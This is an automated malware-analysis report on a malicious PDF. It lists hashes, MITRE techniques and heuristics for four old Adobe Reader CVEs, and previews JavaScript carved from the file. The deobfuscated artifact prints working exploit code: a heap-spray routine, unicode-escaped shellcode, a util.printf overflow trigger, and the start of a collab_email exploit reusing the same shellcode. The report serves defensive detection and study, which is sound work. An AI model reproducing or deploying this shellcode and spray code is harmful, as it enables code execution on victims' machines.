Malicious PDF — malware analysis report

Static analysis result for SHA-256 717468f1b0d1eeae…

MALICIOUS

PDF

118.5 KB
MD5: 8e1a37be0d589cb7e28778568e71d13c SHA-1: 8e62beab29533614b1acab3dd4d08f8ec624bffe SHA-256: 717468f1b0d1eeae2e2e11a58538201c98df6c999454a09cbec80548f2c96377
676 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF file contains heavily obfuscated JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The JavaScript is designed to download and execute a second-stage payload, as indicated by the ClamAV detection of a JavaScript exploit shellcode. The presence of multiple CVEs and the obfuscated JavaScript strongly suggest a malicious exploit kit.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 12

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Large comment-padded JavaScript eval stager high PDF_JS_LARGE_COMMENT_PADDED_EVAL
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js
367e156fa573fdbc3b536c642337bae9d65846b36376c14a81d034574499a96a		 pdf-javascript-stream PDF /JS object 6 at offset 0x143 626557 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function cR7(gIL){ /*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
... (truncated)
legacy_pdfkit_stage_000.js
681dbda57cdbf82f4bef3978ebd94c7026681de1ecfcc152fb2de502ced92b73		 deobfuscated-js comment-padded substitution-hex decoded JavaScript at offset 0x143 10413 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uE4FF%uE624%u8003%uD685%uE403%u6D24%uE843%u96AF%u491F%u96AF%u650B%uE6E0%u1BF4%u6DDB%u5FEF%uE66C%uE403%uE64E%u6A6B%uE86A%u8CEF%u18BC%uEA89%u094C%u04CD%u8E44%u2E30%uBDAE%uDC6B%u4A06%u8CE4%uAFCE%u0C89%u3D4C%uC789%u8ECD%uA858%u3B3E%u086B%uE5B3%u0C0F%uE73B%uE403%uE2AD%u6728%uE2CF%u2408%u1751%u8A6B%u9241%u8C03%u8F53%u8D6D%u1970%uCC56%uBF7D%u2408%u622B%uE4FB%uE624%u1488%uBE9F%uE403%u8C24%u8C03%uA20D%uB3EB%uAF4C%uEBEE%u8E5A%uAF88%uB9C7%u04EB%uE624%u6D03%uCD20%u0F80%uED20%u91C3%u6BD5%uE486%uE626%uB403%u194C%uE403%u1924%uD056%u63A9%uE003%uE624%u8E53%u8C24%u6903%uE6A1%uE401%uB624%uB1FC%u6B1C%uE4B6%uE620%u4803%u262E%u1F76%u216A%uCA05%u9E41%u2366%uE262%uE403%uE624%u618E%uE224%uE403%u2F17%uB452%uB3DB%uA43F%u622B%uE483%uE624%u6D4B%uAA61%uE46B%uE664%u8E03%u1964%uAC56%u262F%u8A77%uA3AD%u8E63%u8C24%u8E03%u8C24%u8E03%u1924%uB456%u262F%uBE77%uE64E%uE46B%uE624%u8E07%u8C24%u0D03%uE68E%uE403%u1974%uB056%u262F%uA677%uA3AD%u696B%u8261%u8C53%uA624%uE403%u93DB%u1B63%u8E51%uB1FC%uED7C%u90C3%u6D31%u8046%u262F%uEA77%u93DB%u1B67%u8651%u91FC%u1968%uA456%u33CF%u91FC%u1968%uA056%u2F0F%uB542%u63A9%uE003%uE624%u1B53%uCA71%u1B69%uB3DB%uB133%u0AAF%u9988%uED2C%u90FC%uB56F%u3A88%u6D72%uD870%u92AF%u9C30%u1527%u6F55%uC652%u1700%u2F17%uA54A%uE589%uB2C0%u1017%u5A0C%uDE34%u90D5%u272C%uE9CD%u1427%u0F43%uDDD5%uBAFD%u0351%u6F59%u6DCF%uC059%u3B27%u6F65%uAD28%uBE88%uE538%u6FDE%u6D20%u2100%uBD7A%uE6E8%u2617%u265E%uE620%uB5EB%u19DB%u8CFC%u9250%uDE73%uC90B%u9762%u874D%u946D%u944B%u906D%u8F56%uCA73%u8947%uCB6E%u9450%u8062%uC941%u873C%uD719%u9725%u824D%uD53E%uD617%uD337%uDE16%uDD67%uD112%u8537%uDF14%uD537%u871C%u873A%u8246%u8066%u8247%uD335%uDF41%uC260%uDB57%uE430%uE624%u0003");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
	
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uE4FF%uE624%u8003%uD685%uE403%u6D24%uE843%u96AF%u491F%u96AF%u650B%uE6E0%u1BF4%u6DDB%u5FEF%uE66C%uE403%uE64E%u6A6B%uE86A%u8CEF%u18BC%uEA89%u094C%u04CD%u8E44%u2E30%uBDAE%uDC6B%u4A06%u8CE4%uAFCE%u0C89%u3D4C%uC789%u8ECD%uA858%u3B3E%u086B%uE5B3%u0C0F%uE73B%uE403%uE2AD%u6728%uE2CF%u2408%u1751%u8A6B%u9241%u8C03%u8F53%u8D6D%u1970%uCC56%uBF7D%u2408%u622B%uE4FB%uE624%u1488%uBE9F%uE403%u8C24%u8C03%uA20D%uB3EB%uAF4C%uEBEE%u8E5A%uAF88%uB9C7%u04EB%uE624%u6D03%uCD20%u0F80%uED20%u91C3%u6BD5%uE486%uE626%uB403%u194C%uE403%u1924%uD056%u63A9%uE003%uE624%u8E53%u8C24%u6903%uE6A1%uE401%uB624%uB1FC%u6B1C%uE4B6%uE620%u4803%u262E%u1F76%u216A%uCA05%u9E41%u2366%uE262%uE403%uE624%u618E%uE224%uE403%u2F17%uB452%uB3DB%uA43F%u622B%uE483%uE624%u6D4B%uAA61%uE46B%uE664%u8E03%u1964%uAC56%u262F%u8A77%uA3AD%u8E63%u8C24%u8E03%u8C24%u8E03%u1924%uB456%u262F%uBE77%uE64E%uE46B%uE624%u8E07%u8C24%u0D03%uE68E%uE403%u1974%uB056%u262F%uA677%uA3AD%u696B%u8261%u8C53%uA624%uE403%u93DB%u1B63%u8E51%uB1FC%uED7C%u90C3%u6D31%u8046%u262F%uEA77%u93DB%u1B67%u8651%u91FC%u1968%uA456%u33CF%u91FC%u1968%uA056%u2F0F%uB542%u63A9%uE003%uE624%u1B53%uCA71%u1B69%uB3DB%uB133%u0AAF%u9988%uED2C%u90FC
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.